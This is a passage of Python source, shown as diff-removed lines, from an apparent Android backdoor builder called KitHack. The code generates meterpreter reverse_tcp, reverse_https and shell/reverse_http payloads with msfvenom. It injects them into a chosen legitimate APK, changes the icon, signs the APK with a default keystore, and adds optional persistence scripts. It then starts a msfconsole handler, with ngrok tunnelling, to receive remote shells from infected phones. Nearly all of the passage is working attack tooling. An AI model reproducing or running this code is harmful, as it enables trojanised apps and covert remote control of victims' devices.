output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - else: - print("{}\n[X] INVALID OPTION\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') - main() - - else: - print("\n{}[X] INVALID OPTION\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') - main() - - elif pay == '03': - print ('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) - print ('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) - - a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - a = a.zfill(2) - - if a == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - break - else: - Tk().withdraw() - icon = filedialog.askopenfilename(title = "KITHACK - SELECT ICON PNG",filetypes = (("png files","*.png"),("all files","*.*"))) - print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - file = open("/tmp/data.txt", "w") - file.write(icon + '\n') - file.write(mainout) - file.close() - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/meterpreter_reverse_tcp LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) - print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool b output/payload -o output/kithack.apk') - location = os.getcwd() - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - # Salida de bucle - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/meterpreter_reverse_tcp LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif a == '02': - print ('{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} Use the old Metasploit method'.format(WHITE, YELLOW)) - print ('{0}[02]{1} Use the new KitHack method'.format(WHITE, YELLOW)) - - m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - m = m.zfill(2) - - if m == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -x {0} -p android/meterpreter_reverse_tcp LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif m == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/meterpreter_reverse_tcp LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) - location = os.getcwd() - print("{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) - print("\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool b output/original -o output/kithack.apk') - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - else: - print("{}\n[X] INVALID OPTION\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') - main() - - else: - print("\n{}[X] INVALID OPTION\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') - main() - - elif pay == '04': - print ('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) - print ('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) - - a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - a = a.zfill(2) - - if a == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - break - else: - Tk().withdraw() - icon = filedialog.askopenfilename(title = "KITHACK - SELECT ICON PNG",filetypes = (("png files","*.png"),("all files","*.*"))) - print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - file = open("/tmp/data.txt", "w") - file.write(icon + '\n') - file.write(mainout) - file.close() - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) - print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool b output/payload -o output/kithack.apk') - location = os.getcwd() - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - # Salida de bucle - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif a == '02': - print ('{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} Use the old Metasploit method'.format(WHITE, YELLOW)) - print ('{0}[02]{1} Use the new KitHack method'.format(WHITE, YELLOW)) - - m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - m = m.zfill(2) - - if m == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -x {0} -p android/meterpreter/reverse_tcp LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif m == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/meterpreter/reverse_tcp LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) - location = os.getcwd() - print("{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) - print("\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool b output/original -o output/kithack.apk') - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - else: - print("{}\n[X] INVALID OPTION\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') - main() - - else: - print("\n{}[X] INVALID OPTION\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') - main() - - elif pay == '05': - print ('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) - print ('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) - - a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - a = a.zfill(2) - - if a == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - break - else: - Tk().withdraw() - icon = filedialog.askopenfilename(title = "KITHACK - SELECT ICON PNG",filetypes = (("png files","*.png"),("all files","*.*"))) - print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - file = open("/tmp/data.txt", "w") - file.write(icon + '\n') - file.write(mainout) - file.close() - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/shell/reverse_http LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) - print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - 